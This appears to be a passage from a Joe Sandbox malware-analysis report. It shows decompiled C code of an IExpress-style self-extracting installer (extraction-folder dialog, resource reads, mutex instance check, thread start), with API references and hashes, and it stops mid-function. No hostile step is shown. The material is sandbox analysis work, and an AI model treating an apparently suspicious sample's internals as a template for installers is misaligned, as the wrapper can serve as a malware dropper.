                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00DE3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E00DE43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0xde9a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xde91e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E00DE44B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0xde91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0xde91e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0xde91e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0xde91e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0xde91e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E00DE658A(0xde91e4, 0x104, 0xde1140);
                                                                                                                                                                                                        								_t27 = E00DE58C8(0xde91e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0xde91e4 - 0x5c;
                                                                                                                                                                                                        									if( *0xde91e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E00DE597D(0xde91e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xde91e5 - 0x5c;
                                                                                                                                                                                                        									if( *0xde91e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E00DE44B9(_t64, 0x54a, 0xde91e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0xde91e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0xde91e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0xde91e4 - 0x5c;
                                                                                                                                                                                                        						if( *0xde91e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0xde9124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0xde9a3c, 0x3e8, 0xde8598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E00DE4224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xde87a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E00DE44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x00de3243
                                                                                                                                                                                                        0x00de3246
                                                                                                                                                                                                        0x00de32ee
                                                                                                                                                                                                        0x00de32f4
                                                                                                                                                                                                        0x00de32f6
                                                                                                                                                                                                        0x00de33d4
                                                                                                                                                                                                        0x00de33d6
                                                                                                                                                                                                        0x00de33db
                                                                                                                                                                                                        0x00de33dc
                                                                                                                                                                                                        0x00de33de
                                                                                                                                                                                                        0x00de33df
                                                                                                                                                                                                        0x00de3370
                                                                                                                                                                                                        0x00de3372
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3372
                                                                                                                                                                                                        0x00de32fc
                                                                                                                                                                                                        0x00de3301
                                                                                                                                                                                                        0x00de3301
                                                                                                                                                                                                        0x00de3303
                                                                                                                                                                                                        0x00de3304
                                                                                                                                                                                                        0x00de3304
                                                                                                                                                                                                        0x00de330a
                                                                                                                                                                                                        0x00de330d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3313
                                                                                                                                                                                                        0x00de3318
                                                                                                                                                                                                        0x00de331a
                                                                                                                                                                                                        0x00de3331
                                                                                                                                                                                                        0x00de3332
                                                                                                                                                                                                        0x00de333a
                                                                                                                                                                                                        0x00de333d
                                                                                                                                                                                                        0x00de337c
                                                                                                                                                                                                        0x00de3388
                                                                                                                                                                                                        0x00de338f
                                                                                                                                                                                                        0x00de3394
                                                                                                                                                                                                        0x00de3396
                                                                                                                                                                                                        0x00de33a4
                                                                                                                                                                                                        0x00de33ab
                                                                                                                                                                                                        0x00de33b6
                                                                                                                                                                                                        0x00de33be
                                                                                                                                                                                                        0x00de33c3
                                                                                                                                                                                                        0x00de33c5
                                                                                                                                                                                                        0x00de3435
                                                                                                                                                                                                        0x00de3437
                                                                                                                                                                                                        0x00de3437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3437
                                                                                                                                                                                                        0x00de33c7
                                                                                                                                                                                                        0x00de33c9
                                                                                                                                                                                                        0x00de33cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de33cc
                                                                                                                                                                                                        0x00de33ad
                                                                                                                                                                                                        0x00de33b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de33b4
                                                                                                                                                                                                        0x00de3398
                                                                                                                                                                                                        0x00de3399
                                                                                                                                                                                                        0x00de339b
                                                                                                                                                                                                        0x00de339c
                                                                                                                                                                                                        0x00de339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de339d
                                                                                                                                                                                                        0x00de334c
                                                                                                                                                                                                        0x00de3351
                                                                                                                                                                                                        0x00de3354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de335c
                                                                                                                                                                                                        0x00de3362
                                                                                                                                                                                                        0x00de3364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3366
                                                                                                                                                                                                        0x00de3367
                                                                                                                                                                                                        0x00de3369
                                                                                                                                                                                                        0x00de336a
                                                                                                                                                                                                        0x00de336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de336b
                                                                                                                                                                                                        0x00de331c
                                                                                                                                                                                                        0x00de3323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3329
                                                                                                                                                                                                        0x00de332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de332b
                                                                                                                                                                                                        0x00de324c
                                                                                                                                                                                                        0x00de324c
                                                                                                                                                                                                        0x00de324f
                                                                                                                                                                                                        0x00de32c8
                                                                                                                                                                                                        0x00de32ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de32ce
                                                                                                                                                                                                        0x00de3251
                                                                                                                                                                                                        0x00de3256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3271
                                                                                                                                                                                                        0x00de3277
                                                                                                                                                                                                        0x00de3279
                                                                                                                                                                                                        0x00de3298
                                                                                                                                                                                                        0x00de329d
                                                                                                                                                                                                        0x00de329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de32b0
                                                                                                                                                                                                        0x00de32b6
                                                                                                                                                                                                        0x00de32b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de32be
                                                                                                                                                                                                        0x00de3280
                                                                                                                                                                                                        0x00de3289
                                                                                                                                                                                                        0x00de328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de328e
                                                                                                                                                                                                        0x00de327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00DE8598,00000200), ref: 00DE3271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE33E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00DE33F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00DE3410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00DE3426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00DE342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00DE343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$cent
                                                                                                                                                                                                        • API String ID: 2418873061-2054018256
                                                                                                                                                                                                        • Opcode ID: 8a155fc0a88232040329073c3947b2aee14a90b49653c56bcfbbc166f439ca40
                                                                                                                                                                                                        • Instruction ID: b57227ea24cd4fdcca37db780e8fc536dc44733c1de3fc790ddae1177fd71d3e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a155fc0a88232040329073c3947b2aee14a90b49653c56bcfbbc166f439ca40
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC5105303413C17AEB267B3B5C8CF7F6A59DB46B54F544028F245DB2D1CAA4DE019271
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0xde9a3c = __ecx;
                                                                                                                                                                                                        				memset(0xde9140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0xde8a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0xde88c0, 0, 0x104);
                                                                                                                                                                                                        				 *0xde93ec = 1;
                                                                                                                                                                                                        				_t20 = E00DE468F("TITLE", 0xde9154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0xde858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0xde9a34;
                                                                                                                                                                                                        					if(E00DE468F("EXTRACTOPT", 0xde9a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0xde9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0xde9120 =  *0xde9120 & _t65;
                                                                                                                                                                                                        							if(E00DE5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0xde8a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xde8184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xde8a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E00DE36EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0xde9a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0xde9a34 & 0x00000100) == 0 || ( *0xde8a38 & 0x00000001) != 0 || E00DE18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E00DE6517(_t57, 0x7d6, _t34, E00DE19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00DE2390(0xde8a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E00DE44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E00DE468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0xde8588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0xde9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E00DE44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E00DE44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0xde8588);
                                                                                                                                                                                                        										 *0xde9124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E00DE44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0xde9124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE2CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE2CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00DE2CF9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE2E0A
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                        • API String ID: 1002816675-2654900392
                                                                                                                                                                                                        • Opcode ID: 67742bd686380bc3c5240dae7246c359ed67b0aef28e7ecf2aa1859633b433d7
                                                                                                                                                                                                        • Instruction ID: 67ba91fec35a255e49fe02d2d44609b2b8ec17cc0a77256c600d086079eca859
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67742bd686380bc3c5240dae7246c359ed67b0aef28e7ecf2aa1859633b433d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4451F2703403D1AAE764BB279C9AB7E369CEB45B10F084039BA85DA3D5DAB4CC419635
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E00DE34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0xde91d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0xde8584 = _t35;
                                                                                                                                                                                                        					E00DE43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0xde8184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E00DE4FE0, 0, 0, 0xde8798);
                                                                                                                                                                                                        					 *0xde879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
